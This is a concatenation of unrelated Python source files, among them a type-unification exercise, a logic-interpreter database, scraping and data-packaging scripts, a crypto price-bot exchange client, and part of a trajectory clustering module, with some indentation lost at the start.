    # This decorator assumes that f returns an object of type Type.
def k(*args):
return f(*args).copy()
return k
class TypeEcuationTerm:
    # Represents the type equation left = right
    def __init__(self, left, right):
        self.left = left
        self.right = right
    # Returns the normalized version of the equation
def norm(self):
if self.left is not VariableType:
return TypeEcuationTerm(self.right, self.left)
return self
    # String representation
    def __str__(self):
        return f'{str(self.left)} = {str(self.right)}'
    # Hash - so equations can be stored in a set
    def __hash__(self):
        return hash(str(self))
    # Equality between equations
def __eq__(self, other):
return str(self) == str(other)
class Type:
    # Base type class.
    # Equality is given by the str representation.
    def __eq__(self, other):
        return str(self) == str(other)
    # We define the kind property so we can use
    # the is operator, e.g.: x.kind is ConstType
@property
def kind(self):
return self.__class__
class ConstType(Type):
    # Constant type class
    def __init__(self, token):
        self.token = token
    # Its representation is its token
    def __str__(self):
        return self.token
    # A constant type cannot be unified against
def unify(self, other):
raise Exception(
f'Error: no se puede unificar {str(other)} con una constante.')
# Copy
def copy(self):
return ConstType(self.token)
    # Nothing can be substituted inside a constant
def replacing_var(self, var, value):
raise Exception(
f'Error: No se pueden reemplazar valores dentro de una constante.')
class VariableType(Type):
    # Variable type
    def __init__(self, token):
        self.token = token
    # The str representation is its token
    def __str__(self):
        return self.token
    # A variable type cannot be unified without context
def unify(self, other):
raise Exception(
f'Error: no se puede unificar {str(other)} con una variable sin contexto.')
# Copy
def copy(self):
return VariableType(self.token)
    # Textual substitution
@return_copy
def replacing_var(self, var, value):
if self == var:
return value
return self
class FuncType(Type):
    # Function type.
    # Holds the type of the domain (domain) and the type of the range (target).
    def __init__(self, domain, target):
        self.domain = domain
        self.target = target
    # str representation
def __str__(self):
domain_str = f'({str(self.domain)})' if self.domain.kind is FuncType else str(
self.domain)
target_str = f'{str(self.target)}'
return f'{domain_str} -> {target_str}'
    # Unification over an application
@return_copy
def unify(self, other):
if self.domain.kind is ConstType:
assert other == self.domain, f'Error: no se pudo unificar {str(self.domain)} con {str(other)}'
return self.target
if self.domain.kind is VariableType:
if self.target.kind is ConstType:
return self.target
if self.target.kind is VariableType:
return other
if self.target.kind is FuncType:
return self.target.replacing_var(self.domain, other)
if self.domain.kind is FuncType:
assert other.kind is FuncType
            # Initial equation
            equations = {TypeEcuationTerm(self.domain, other)}
            change = True
            while change:
                # Remove equations of the form X = X
                new_eq = {eq for eq in equations if eq.left != eq.right}
                # Reduce equations between functions into sub-equations
fun_eq = {
eq for eq in new_eq if eq.left.kind is FuncType and eq.right.kind is FuncType}
new_eq = new_eq - fun_eq
for k in fun_eq:
domain_eq = TypeEcuationTerm(
k.right.domain, k.left.domain).norm()
target_eq = TypeEcuationTerm(
k.right.target, k.left.target).norm()
new_eq.add(domain_eq)
new_eq.add(target_eq)
                # Stop when nothing changed in this pass
                change = not (new_eq == equations)
                equations = new_eq
            # Look for inconsistencies -> Const = Const
if len({eq for eq in equations if eq.left.kind is ConstType and eq.right.kind is ConstType}) > 0:
raise Exception(
f'Error: no se puede unificar {str(self.domain)} con {str(other)}.')
            # Look for further inconsistencies
for eq1 in equations:
for eq2 in equations:
# Circular -> a = b and b = a
if eq1.left == eq2.right and eq1.right == eq2.left:
raise Exception(
f'Error: no se puede unificar {str(self.domain)} con {str(other)}. Referencia circular')
# Contradiction -> a = b and a = c
if eq1.left == eq2.left and eq1.right != eq2.right:
raise Exception(
f'Error: no se puede unificar {str(self.domain)} con {str(other)}. Contradiccion')
            # At this point every equation has the form
            # var = t
            # with t.kind is not VariableType and var.kind is VariableType.
            # Apply the resulting equations as substitutions.
result = self.target
for eq in equations:
result = result.replacing_var(eq.left, eq.right)
return result
# Deep copy
def copy(self):
return FuncType(self.domain.copy(), self.target.copy())
    # Textual substitution
def replacing_var(self, var, value):
copy = self.copy()
# replacing in domain
if copy.domain.kind is not ConstType:
copy.domain = copy.domain.replacing_var(var, value)
# replacing in target
if copy.target.kind is not ConstType:
copy.target = copy.target.replacing_var(var, value)
return copy
class TypeTransformer(Transformer):
    # Transformer for the parser
def const(self, t):
token, = t
return ConstType(token)
def var(self, t):
token, = t
return VariableType(token)
def func(self, val):
domain, target = val
return FuncType(domain, target)
class TypeParser:
    # Lark parser
def __init__(self):
self.parser = Lark(r"""
?type: func
| paren
| CONST -> const
| VAR -> var
CONST : /([A-Z])\w*/
VAR : /([a-z])\w*/
func : type "->" type
?paren : "(" type ")"
%import common.WS
%ignore WS
""", start='type', parser='lalr', lexer='contextual')
def parse(self, string):
return self.parser.parse(string)
def transform(self, tree):
return TypeTransformer().transform(tree)
def inter(self, string):
return self.transform(self.parse(string))
# --------------- parse
to_parse = "a -> a -> a"
transformed = TypeParser().inter(to_parse)
print(to_parse) # a -> a -> a
# --------------- unification
# ----- domain constant
constant_constant = "Int -> Bool"
constant_constant_t = TypeParser().inter(constant_constant)
correct_constant = "Int"
correct_constant_t = TypeParser().inter(correct_constant)
print(constant_constant_t.unify(correct_constant_t)) # Bool
# # must fail
# wrong_constant = "Bool"
# wrong_constant_t = TypeParser().inter(wrong_constant)
# print(constant_constant_t.unify(wrong_constant_t))
# ----- domain variable and target constant
var_constant = "a -> String"
var_constant_t = TypeParser().inter(var_constant)
whatever = "a -> a"
whatever_t = TypeParser().inter(whatever)
print(var_constant_t.unify(whatever_t)) # String
# ----- domain variable and target variable
var_var = "a -> a"
var_var_t = TypeParser().inter(var_var)
whatever = "a -> a"
whatever_t = TypeParser().inter(whatever)
print(var_var_t.unify(whatever_t)) # a -> a
# ----- domain variable and target function
var_fun = "a -> b -> a -> b -> a"
var_fun_t = TypeParser().inter(var_fun)
whatever = "Bool"
whatever_t = TypeParser().inter(whatever)
print(var_fun_t.unify(whatever_t)) # b -> Bool -> b -> Bool
# ----- domain function and target function
fun_fun = "(b -> T) -> (b -> T)"
fun_fun_t = TypeParser().inter(fun_fun)
whatever = "E -> c"
whatever_t = TypeParser().inter(whatever)
print(fun_fun_t.unify(whatever_t)) # E -> T
``` |
{
"source": "joaobose/CI3641-exam-3",
"score": 3
} |
#### File: pregunta-6/src/database.py
```python
from .libparse import ExpParser
from .datamodel import Atom, Variable, Rule, Struct, merge_scopes, project_scope_to_namespace
class InterpreterDatabase:
def __init__(self):
        # List of rules in the database.
        # This includes facts: a fact f(x) is represented
        # by the rule f(x) :- True
self.rules = []
self.parser = ExpParser()
def define(self, raw):
"""Define un hecho o regla en la base datos del interprete"""
# Parseando y validando
expresion = self.parser.inter(raw)
self.validate(expresion)
def_label = 'regla'
if expresion.kind is not Rule:
def_label = 'hecho'
expresion = Rule(expresion, [True])
self.rules.append(expresion)
return def_label, expresion
def parse_ask(self, raw):
"""Parsea la expresion que se utilizara para realizar un query"""
# Parseando y validando
expresion = self.parser.inter(raw)
self.validate(expresion)
if expresion.kind is Rule:
raise Exception(
f'No se puede consultar una regla.')
return expresion
def validate(self, expresion):
"""Valida expresiones introducidas a la base de datos"""
if expresion.kind is Variable:
raise Exception(
f'No se pueden expresar variables fuera de alguna estructura')
if expresion.kind is not Rule:
return
if expresion.consecuente.kind is Variable or \
not expresion.is_fact and any(
[ant.kind is Variable for ant in expresion.antecedentes]):
raise Exception(
f'No se pueden expresar variables fuera de alguna estructura')
@property
def facts(self):
        # Subset of the rules that are facts
return [rule for rule in self.rules if rule.is_fact]
def query(self, query):
"""Realiza una consulta a la base datos"""
# Este metodo es un generator (iterador) de python
# Cada elemento de la secuencia generada es un solucion al query
# None se interpreta como solucion no satifacible
query = query.copy()
        # Expand solutions starting from the first term of the query
        canditate = query.pop(0)
        # Check whether the candidate is a fact
is_fact = any(
[canditate == fact.consecuente for fact in self.facts])
        # If it is a fact, that component of the conjunction is already true.
if is_fact:
            # If candidate was the only element of the conjunction,
            if len(query) == 0:
                # the whole conjunction is already true
yield set()
else:
                # Otherwise, query the next element of the conjunction
for x in self.query(query):
if x is not None:
yield x
else:
            # Explore the unification possibilities
            for unificable in self.rules:
                # If it is unifiable
                if canditate.is_unificable(unificable):
                    # Unify and obtain the new sub query
sub_scope, sub_query = canditate.unificate(
unificable)
                    # Substitute the unification scope into the rest of the query
                    _query = [x.textual_sub(sub_scope) for x in query]
                    # Explore whether the sub query is satisfiable (DFS)
for sub_query_result in self.query(sub_query):
                        # If the sub query satisfied candidate,
                        if sub_query_result is not None:
                            # substitute the resulting scope into the rest of the query
rest_query = [x.textual_sub(
sub_query_result) for x in _query]
                            # Merge the resulting scope into the accumulated scope
rest_scope = project_scope_to_namespace(merge_scopes(
sub_scope, sub_query_result), canditate.namespace)
                            # If the scope yields a contradiction, this branch has no solution.
if rest_scope is None:
continue
if len(rest_query) == 0:
                                # the whole conjunction is already true
                                yield rest_scope
                            else:
                                # otherwise, query the next element of the conjunction
for x in self.query(rest_query):
if x is not None:
yield merge_scopes(rest_scope, x)
        # If candidate could not be satisfied along any of these paths,
        # then candidate is unsatisfiable and
        # the conjunction is false by short-circuiting.
yield None
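# Hypothetical usage sketch. The concrete clause syntax is defined by libparse's ExpParser (not shown
# here) and the exact shape query() expects (a list of goal terms), so the lines below only illustrate
# the public entry points and are not verified inputs:
#
#   db = InterpreterDatabase()
#   db.define('padre(juan, maria)')        # stored as the rule padre(juan, maria) :- True
#   goal = db.parse_ask('padre(juan, X)')
#   for solution in db.query([goal]):
#       print(solution)                    # a variable scope, or None if unsatisfiable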
``` |
{
"source": "JoaoBSobrinho/MOHID_python_tools",
"score": 3
} |
#### File: HDF5_maps_with_cartopy/src/grid_to_center_cells.py
```python
import numpy as np
def lonlat_grid_to_center_cells(lon_grd, lat_grd):
n_lines = lon_grd.shape[0]
n_columns = lon_grd.shape[1]
lon_cen = np.zeros((n_lines-1, n_columns-1))
lat_cen = np.zeros((n_lines-1, n_columns-1))
for i in range(0,n_lines-1):
lon_i = lon_grd[i]
lat_i = lat_grd[i]
lon_i1 = lon_grd[i+1]
lat_i1 = lat_grd[i+1]
for j in range(0,n_columns-1):
XSW = lon_i[j]
YSW = lat_i[j]
XSE = lon_i[j+1]
YSE = lat_i[j+1]
XNE = lon_i1[j+1]
YNE = lat_i1[j+1]
XNW = lon_i1[j]
YNW = lat_i1[j]
lon_cen[i][j] = (XSW + XSE + XNE + XNW) / 4.0
lat_cen[i][j]= (YSW + YSE + YNE + YNW) / 4.0
return (lon_cen, lat_cen)
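# Minimal usage sketch with a synthetic 3x3 corner grid (illustrative values only):
#
#   lon_grd, lat_grd = np.meshgrid(np.array([0.0, 1.0, 2.0]), np.array([40.0, 41.0, 42.0]))
#   lon_cen, lat_cen = lonlat_grid_to_center_cells(lon_grd, lat_grd)
#   # lon_cen.shape == (2, 2); lon_cen[0, 0] == 0.5 and lat_cen[0, 0] == 40.5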
``` |
{
"source": "joaocaldeira/keras-vis",
"score": 3
} |
#### File: applications/self_driving/model.py
```python
from keras.layers.core import Dropout, Flatten
from keras.layers.convolutional import MaxPooling2D, Conv2D
from keras.models import Model
from keras.layers import Input, Dense
FRAME_H = 70
FRAME_W = 180
def build_model():
inp = Input(shape=(FRAME_H, FRAME_W, 3))
x = Conv2D(filters=8, kernel_size=(5, 5), activation='relu')(inp)
x = MaxPooling2D((2, 2))(x)
x = Conv2D(filters=16, kernel_size=(5, 5), activation='relu')(x)
x = MaxPooling2D((2, 2))(x)
x = Conv2D(filters=32, kernel_size=(5, 5), activation='relu')(x)
x = MaxPooling2D((2, 2))(x)
x = Flatten()(x)
x = Dropout(0.5)(x)
x = Dense(128, activation='relu')(x)
x = Dropout(0.5)(x)
x = Dense(1, activation='tanh')(x)
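    # tanh bounds the single output to [-1, 1]; in this self-driving example that is
    # presumably a normalized steering value.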
return Model(inputs=[inp], outputs=[x])
if __name__ == '__main__':
model = build_model()
model.summary()
``` |
{
"source": "joaocamargo/estudos-python",
"score": 3
} |
#### File: BookingScraper-joao_v2/BookingScraper/airbnb.py
```python
import argparse
import argcomplete
from argcomplete.completers import ChoicesCompleter
from argcomplete.completers import EnvironCompleter
import requests
from bthread import BookingThread
from bs4 import BeautifulSoup
from file_writer import FileWriter
hotels = []
def get_countries():
with open("europa2020.txt", "r") as f:
countries = f.read().splitlines()
return countries
def get_booking_page(session, offset, rooms, country, dest_id, DayIni, DayFim):
print('get_booking_page(session, offset, rooms, country, dest_id, DayIni, DayFim):')
print(session, offset, rooms, country, dest_id, DayIni, DayFim)
diaInicial = str(int(DayIni[0:2]))
mesInicial = str(int(DayIni[3:5]))
anoInicial = str(int(DayIni[6:10]))
diaFinal = str(int(DayFim[0:2]))
mesFinal = str(int(DayFim[3:5]))
anoFinal = str(int(DayFim[6:10]))
'''
Make request to airbnb page and parse html
:param offset:
:return: html page
'''
url = 'https://www.airbnb.com.br/s/Londres/'\
'homes?refinement_paths%5B%5D=%2Fhomes¤t_tab_id=home_tab&selected_tab_id=home_tab&source=mc_search_bar&search_type=unknown'\
'&click_referer=t%3ASEE_ALL%7Csid%3A874f16ee-6196-4289-9717-17dec73e1e5c%7Cst%3AMAGAZINE_HOMES&screen_size=large&hide_dates_and_guests_filters=false'\
'&ne_lat=51.80546533345978&ne_lng=0.4969575708007312&sw_lat=51.17528882051496&sw_lng=-0.8200285131836154&zoom=10&search_by_map=false&checkin={anoInicial}-{mesInicial}-{diaInicial}'\
'&checkout={anoFinal}-{mesFinal}-{diaFinal}&adults={rooms}&property_type_id%5B%5D=1&property_type_id%5B%5D=43&property_type_id%5B%5D=47'\
'&place_id=ChIJdd4hrwug2EcRmSrV3Vo6llI&room_types%5B%5D=Entire%20home%2Fapt'\
'§ion_offset=6&items_offset=18'.format(rooms=rooms, country=country.replace(' ', '+'),anoFinal=anoFinal,mesFinal=mesFinal,diaInicial=diaInicial,mesInicial=mesInicial,anoInicial=anoInicial,diaFinal=diaFinal,dest_id=dest_id) + str(offset)
r = requests.get(url, headers=
{'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0)'
' Gecko/20100101 Firefox/48.0'})
html = r.content
print(url)
parsed_html = BeautifulSoup(html, 'lxml')
return parsed_html
def process_hotels(session, offset, rooms, country, dest_id, DayIni, DayFim):
parsed_html = get_booking_page(session, offset, rooms, country, dest_id,DayIni, DayFim)
hotel = parsed_html.find_all('div', {'class': 'sr_item'})
for ho in hotel:
#print("ho.find('a', {'class': 'jq_tooltip'})")
#print(ho.find('a', {'class': 'jq_tooltip'}))
#name = ho.find('a', {'class': 'jq_tooltip'})['data-title']
print("ho.find('span', {'class': 'sr-hotel__name'})")
#print(ho.find('span', {'class': 'sr-hotel__name'}))
if ho.find('span', {'class': 'sr-hotel__name'}) is not None:
name = str(ho.find('span', {'class': 'sr-hotel__name'}).text.encode('utf-8')).replace('\\n','').replace("b","").replace("'","").replace('\\','')
else:
name = '-1'
if ho.find('div', {'class': 'bui-price-display__value prco-inline-block-maker-helper'}) is not None:
price = ho.find('div', {'class': 'bui-price-display__value prco-inline-block-maker-helper'}).text.replace('\n','').replace("b","").replace("'","")
else:
price = '-1'
if ho.find('span', {'class': '_ky9opu0'}) is not None:
nota = str(ho.find('span', {'class': '_ky9opu0'}).text.replace('\n','').replace("b","").replace("'",""))
else :
nota = '-1'
if ho.find('span', {'title': 'This is the straight-line distance on the map. Actual travel distance may vary.'}) is not None:
distance = str(ho.find('span', {'title': 'This is the straight-line distance on the map. Actual travel distance may vary.'}).text.encode('utf-8')).replace('\\n','').replace("b","").replace("'","").replace('\\','')
else :
distance = '-1'
# if ho.find('a', {'class': 'bui-link'}) is not None :
# result = [str(item) for item in ho.find_all('span', attrs={'data-bui-component' : 'Tooltip'})]
# print('TAMANHO TOOLTIP', str(len(result)))
# for i in result:
# print(i)
# for i in result:
# if i in 'km':
# distance = str(i)
# else:
# distance = '----'
# else:
# distance = '----'
# if len(result) ==1:
# if result[0] in 'km':
# distance = result
# else:
# distance = 'aaaaa' + str(len(result))
# else:
# distance = '---'
hotels.append(DayIni+';'+DayFim+';'+name + ';' + price + ';' + nota + ';' + distance)
#hotels.append(str(len(hotels) + 1) + ' : ' + name + ' : ' + price)
def prep_data(rooms=1, country='Macedonia', dest_id='-1', DayIni='01/01/2019', DayFim='02/01/2019', out_format=None):
'''
Prepare data for saving
:return: hotels: set()
'''
offset = 1
session = requests.Session()
parsed_html = get_booking_page(session, offset, rooms, country, dest_id, DayIni,DayFim)
all_offset = parsed_html.find_all('li', {'class':
'sr_pagination_item'})[-1].get_text().splitlines()[-1]
threads = []
for i in range(int(all_offset)):
offset += 1
t = BookingThread(session, offset, rooms, country,dest_id,DayIni, DayFim, process_hotels)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
hotels2 = hotels
return hotels2
def get_data(rooms=1, country='Macedonia', dest_id='-1',DayIni='01/01/2019',DayFim='02/01/2019', out_format=None):
'''
Get all accomodations in Macedonia and save them in file
:return: hotels-in-macedonia.{txt/csv/xlsx} file
'''
print('Procurando por',country)
hotels_list = prep_data(rooms, country,dest_id, DayIni, DayFim, out_format)
save_data(hotels_list , out_format=out_format, country=country)
def save_data(data, out_format, country):
'''
Saves hotels list in file
:param data: hotels list
:param out_format: json, csv or excel
:return:
'''
writer = FileWriter(data, out_format, country)
file = writer.output_file()
print('All accommodations are saved.')
print('You can find them in', file, 'file')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
countries = get_countries()
parser.add_argument("--rooms",
help='Add the number of rooms to the booking request.',
default=1,
type=int,
nargs='?')
parser.add_argument("--country",
help='Add the country to the booking request.',
default='Macedonia',
nargs='?').completer = ChoicesCompleter(countries)
parser.add_argument("--dest_id",
help='Add the country to the booking request.',
default='0',
nargs='?')
parser.add_argument("--DayIni",
help='Data inicial',
default='01/01/2019',
nargs='?')
parser.add_argument("--DayFim",
help='Data inicial',
default='02/01/2019',
nargs='?')
parser.add_argument("--out_format",
help='Add the format for the output file. Add excel, json or csv.',
default='json',
choices=['json', 'excel', 'csv'],
nargs='?').completer = EnvironCompleter
argcomplete.autocomplete(parser)
args = parser.parse_args()
localidades = [{
'Pais': 'London',
'dest_id': '-2601889'
}, {
'Pais': 'Utrecht',
'dest_id': '-2154382'
}, {
'Pais': 'Buzios',
'dest_id': '-626254'
}, {
'Pais': '',
'dest_id': ''
}]
countryAux = [d['Pais'] for d in localidades if args.dest_id in d['dest_id']]
if len(countryAux)>0:
country = countryAux[0]
print('Parametros')
print(args.rooms, country,args.dest_id,args.DayIni,args.DayFim, args.out_format)
get_data(args.rooms, country,args.dest_id,args.DayIni,args.DayFim, args.out_format)
else:
country = 'Nao Identificado'
locais = [d['Pais'] + ':' + d['dest_id'] for d in localidades if d['Pais'] != '']
print('----------')
print('Utilize uma das seguintes localizações')
for i in locais:
print(i)
print('----------')
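    # Hypothetical command line (dest_id must match one of the entries in 'localidades' above;
    # dates use the DD/MM/YYYY format expected by get_booking_page):
    #
    #   python airbnb.py --rooms 2 --dest_id=-2601889 --DayIni 01/03/2020 --DayFim 05/03/2020 --out_format csv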
```
#### File: BookingScraper-joao_v2/BookingScraper/file_writer.py
```python
class FileWriter:
#TODO: cleanup output_file
def __init__(self, data, out_format=None, country='Macedonia'):
self.data = data
self.format = out_format
self.country= country
def output_file(self):
'''
Write list of hotels in file
:return:
'''
format = self.format.lower()
file_name = ''
if format == 'json' or format is None:
import json
file_name = 'hotels-in-{country}.txt'.format(
country=self.country.replace(" ", "-"))
with open(file_name, 'w') as outfile:
json.dump(list(self.data), outfile, indent=2, ensure_ascii=False)
elif format == 'excel':
from openpyxl import Workbook
wb = Workbook()
ws = wb.active
heading1 = '#'
heading2 = 'Accommodation'
ws.cell(row=1, column=1).value = heading1
ws.cell(row=1, column=2).value = heading2
for i, item in enumerate(self.data):
# Extract number and title from string
tokens = item.split()
n = tokens[0]
title = ' '.join(tokens[2:])
ws.cell(row=i + 2, column=1).value = n
ws.cell(row=i + 2, column=2).value = title
file_name = 'hotels-in-{country}.xls'.format(
country=self.country.replace(" ", "-"))
wb.save(file_name)
elif format == 'csv':
file_name = 'hotels-in-{country}.csv'.format(
country=self.country.replace(" ", "-"))
with open(file_name, 'w') as outfile:
for i, item in enumerate(self.data):
# Extract number and title from string
tokens = item.split()
n = tokens[0]
title = ' '.join(tokens[2:])
s = n + ', ' + title + '\n'
outfile.write(s)
return file_name
``` |
{
"source": "JoaoCampos89/0xbtc-discord-price-bot",
"score": 3
} |
#### File: 0xbtc-discord-price-bot/exchanges/enclavesdex.py
```python
import websocket
import json
from .base_exchange import BaseExchangeAPI
def wei_to_ether(amount_in_wei):
return int(amount_in_wei) / 1000000000000000000.0
class EnclavesAPI(BaseExchangeAPI):
def __init__(self, currency_symbol):
super().__init__()
self._WEBSOCKET_URL = "ws://app.enclaves.io:80/socket.io/?EIO=3&transport=websocket";
if currency_symbol == "0xBTC":
self._CONTRACT_ADDRESS = '0xb6ed7644c69416d67b522e20bc294a9a9b405b31'
elif currency_symbol == "XXX":
self._CONTRACT_ADDRESS = '0x0000000000000000000000000000000000000000'
else:
raise RuntimeError("Unknown currency_symbol {}, need to add address to enclavesdex.py".format(currency_symbol))
self.currency_symbol = currency_symbol
self.exchange_name = "Enclaves DEX"
self.command_names = ['enclaves', 'encalves']
self.short_url = "https://bit.ly/2rnYA7b"
async def _update(self, timeout=10.0):
ws = websocket.create_connection(self._WEBSOCKET_URL, timeout=timeout)
# real implementations read session id etc first so we do the same
result = ws.recv()
result = ws.recv()
# request actual data
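        # ('42' is the socket.io framing: engine.io packet type 4, "message", followed by
        #  socket.io packet type 2, "EVENT", then the JSON event payload)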
ws.send('42["getTokens"]')
result = ws.recv()
try:
all_data = json.loads(result[2:])
except json.decoder.JSONDecodeError:
if "be right back" in response:
raise TimeoutError("api is down - got 404 page")
else:
raise TimeoutError("api sent bad data ({})".format(repr(response)))
data_was_updated = False
tokens = all_data[1]['tokens']
for token in tokens:
if token['addr'] == self._CONTRACT_ADDRESS:
self.price_eth = float(token['priceEnclaves'])
self.volume_eth = wei_to_ether(token['volumeEther'])
self.change_24h = float(token['change'])
data_was_updated = True
if self.price_eth == self.volume_eth == self.change_24h == 0.0:
raise TimeoutError('All values from enclaves read 0')
if not data_was_updated:
raise RuntimeError('Response from Enclaves did not include indicated currency ({}).'.format(self.currency_symbol))
if __name__ == "__main__":
e = EnclavesAPI('0xBTC')
e.load_once_and_print_values()
```
#### File: JoaoCampos89/0xbtc-discord-price-bot/formatting_helpers.py
```python
import datetime
import platform
def unix_timestamp_to_readable_date(timestamp):
time = datetime.datetime.fromtimestamp(timestamp)
if platform.system() == "Linux":
return time.strftime("%a %B %-e %Y")
else:
return time.strftime("%a %B %#e %Y")
def unix_timestamp_to_readable_date_time(timestamp):
# TODO: implement
time = datetime.datetime.fromtimestamp(timestamp)
if platform.system() == "Linux":
return time.strftime("%a %B %-e %Y")
else:
return time.strftime("%a %B %#e %Y")
def string_to_float(value):
"""custom version of float() that supports commas as decimal separators
when the input contains no periods"""
# if no periods (.) then assume commas are decimal separators
if '.' not in value:
value = value.replace(',', '.')
# if decimals exist then simply remove commas
else:
value = value.replace(',', '')
return float(value)
def percent_change_to_emoji(percent_change):
values = [
# [0.3, ":arrow_up:"],
# [0.1, ":arrow_upper_right:"],
# [-0.1, ":arrow_right:"],
# [-0.3, ":arrow_lower_right:"],
# [-1, ":arrow_down:"],
[0.3, ":chart_with_upwards_trend:"],
[0.1, ""],
[-0.1, ""],
[-0.3, ""],
[-1, ":chart_with_downwards_trend:"],
]
for v in values:
if percent_change > v[0]:
return v[1]
# return the last option as fallback
return values[-1:][0][1]
def round_to_n_decimals(x, n=1):
from math import log10, floor
assert n >= 1
return round(x, -int(floor(log10(abs(x))))+n-1)
def prettify_decimals(number):
if number == 0:
return "0"
if number < 1e-12:
rounded = round_to_n_decimals(number, 3)
return "{:.2e}".format(rounded)
if number < 1.0:
rounded = round_to_n_decimals(number, 3)
return "{:.14f}".format(rounded).rstrip("0")
if number < 10.0:
rounded = round_to_n_decimals(number, 4)
return "{:.3f}".format(rounded)
if number < 10000.0:
return "{:.2f}".format(number)
if number < 1e9:
return "{:,.0f}".format(number)
if number < 1e15:
return to_readable_thousands(number, unit_type='long')
return "{:.2e}".format(number).replace("+", "")
def to_readable_thousands(value, unit_type='short', decimals=1):
if unit_type == "long":
units = ['', ' thousand', ' million', ' billion', ' trillion', ' quadrillion', ' sextillion', ' septillion', ' octillion', ' nonillion']
if unit_type == "short":
units = ['', 'k', 'm', 'b', 't', 'p', 's']
if unit_type == "hashrate":
units = ['H/s', ' Kh/s', ' Mh/s', ' Gh/s', ' Th/s', ' Ph/s', ' Eh/s', ' Zh/s', ' Yh/s']
if unit_type == "short_hashrate":
units = ['H', ' Kh', ' Mh', ' Gh', ' Th', ' Ph', ' Eh', ' Zh', ' Yh']
for unit in units:
if value < 1000:
return "{:.1f}{}".format(value, unit)
value /= 1000
fmt_str = "{:." + str(decimals) + "f}{}"
return fmt_str.format(value*1000, units[-1])
def seconds_to_n_time_ago(seconds):
if seconds < 60:
return 'now'
minutes = seconds / 60
if minutes < 60:
return "{:.0f}m ago".format(minutes)
return "{:.0f}h ago".format(minutes / 60)
def seconds_to_time(seconds, granularity=2):
result = []
intervals = (
('centuries', 60*60*24*7*4.34524*12*10*10),
('decades', 60*60*24*7*4.34524*12*10),
('years', 60*60*24*7*4.34524*12),
('months', 60*60*24*7*4.34524),
('weeks', 60*60*24*7),
('days', 60*60*24),
('hours', 60*60),
('minutes', 60),
('seconds', 1),
)
if seconds == 0:
return '0 seconds'
for name, multiplier in intervals:
value = seconds // multiplier
if value > 0:
seconds -= value * multiplier
if value == 1:
name = name.rstrip('s')
result.append("{:.0f} {}".format(value, name))
return ', '.join(result[:granularity])
``` |
{
"source": "JoaoCarabetta/brasilio-package",
"score": 3
} |
#### File: brasilio-package/src/capture.py
```python
import requests
import tools
import os
def me_liberte(url, filename , verbose=False):
if verbose:
print('Downloading')
print(url)
res = requests.get(url)
with open(os.path.join(tools.output_path, filename), 'w+') as f:
f.write(res.text)
tools.generate_resources(filename, verbose=verbose)
return res
if __name__ == '__main__':
    # Help <NAME> free this data!
prisioneiros = [
{'cela':'http://www.ispdados.rj.gov.br/Arquivos/UppEvolucaoMensalDeTitulos.csv',
'nome': 'evolucao-seguranca-upp-rj.csv',
'type':'csv'},
{'cela':'http://www.ispdados.rj.gov.br/Arquivos/ArmasDP2003_2006.csv',
'nome': 'apreensao-armas-por-dp-rj.csv',
'type':'csv'},
]
verbose=True
with tools.Brasilio(verbose=verbose) as gilmar_mendes:
for prisioneiro in prisioneiros:
me_liberte(prisioneiro['cela'],
filename=prisioneiro['nome'],
verbose=verbose)
```
#### File: brasilio-package/src/tools.py
```python
import rows
import os
from timeit import default_timer
import json
output_path = '../package/data/'
class Brasilio(object):
def __init__(self, output_path='../package/data/', verbose=False):
self.verbose = verbose
self.output_path = output_path
self.timer = default_timer
def __enter__(self):
# Cria diretório package
if not os.path.exists(self.output_path):
os.makedirs(self.output_path)
# Cria resouces.py vazio
json.dump([], open("resources.json", "w"), indent=2)
# Start Timer
self.start = self.timer()
return self
def __exit__(self, *args):
# Cria datapackage
create_datapackage(self.output_path, verbose=False)
# End Timer
end = self.timer()
self.elapsed_secs = end - self.start
        self.elapsed = self.elapsed_secs # seconds
if self.verbose:
print('Sucesso!\n Sua captura demorou: {0:.2f} s'.format(self.elapsed))
def generate_resources(filename, verbose=False):
data_path = os.path.join(output_path, filename)
if verbose:
print('Reading Data')
data = rows.import_from_csv(data_path)
translate = {int: 'integer',
str: 'string'}
resource = {'format': "csv",
"url": "http://brasil.io/dataset/{}?format=csv".format(filename.split('.')[0]),
"path": data_path,
"profile": "tabular-data-resource",
'schema': {
'fields': []}
}
for i, field in enumerate(data.field_names):
resource['schema']['fields'].append({'name': field,
'type': translate[data.field_types[i].TYPE[0]]})
if verbose:
print('Writing resources.json')
# print(type(resources))
# print(json.dumps(resources))
resources = json.load(open("resources.json", "r"))
resources.append(resource)
json.dump(resources, open("resources.json", "w"), indent=2)
def create_datapackage(output_path, verbose=False):
    # Create datapackage.json
if verbose:
print("Criando datapackage.json")
with open("metadata.json", "r") as mfd:
output = json.load(mfd)
with open("resources.json", "r") as rfd:
output['resources'] = json.load(rfd)
with open("../package/datapackage.json", "w") as datapackage:
json.dump(output, datapackage, indent=2)
if __name__ == '__main__':
pass
``` |
{
"source": "JoaoCarabetta/PyMove",
"score": 3
} |
#### File: models/pattern_mining/clustering.py
```python
from typing import Callable, Dict, Optional, Text, Union
import numpy as np
from pandas import DataFrame
from sklearn.cluster import DBSCAN, KMeans
from pymove.utils.constants import EARTH_RADIUS, LATITUDE, LONGITUDE, N_CLUSTER
from pymove.utils.conversions import meters_to_eps
from pymove.utils.log import progress_bar, timer_decorator
@timer_decorator
def elbow_method(
move_data: DataFrame,
k_initial: Optional[int] = 1,
max_clusters: Optional[int] = 15,
k_iteration: Optional[int] = 1,
random_state: Optional[int] = None
) -> Dict:
"""
Determines the optimal number of clusters in the range set by the user using
the elbow method.
Parameters
----------
move_data : dataframe
The input trajectory data.
k_initial: int, optional
The initial value used in the interaction of the elbow method.
Represents the maximum numbers of clusters, by default 1
max_clusters: int, optional
The maximum value used in the interaction of the elbow method.
Maximum number of clusters to test for, by default 15
k_iteration: int, optional
Increment value of the sequence used by the elbow method, by default 1
random_state: int, RandomState instance
Determines random number generation for centroid initialization.
Use an int to make the randomness deterministic, by default None
Returns
-------
dict
The inertia values for the different numbers of clusters
Example
-------
clustering.elbow_method(move_data=move_df, k_iteration=3)
{
1: 55084.15957839036,
4: 245.68365592382938,
7: 92.31472644640075,
10: 62.618599956870355,
13: 45.59653757292055,
}
"""
message = 'Executing Elbow Method to:\n...K of %srs to %srs from k_iteration:%srs\n'
message = message % (k_initial, max_clusters, k_iteration)
print(message, flush=True)
inertia_dic = {}
for k in progress_bar(range(k_initial, max_clusters + 1, k_iteration)):
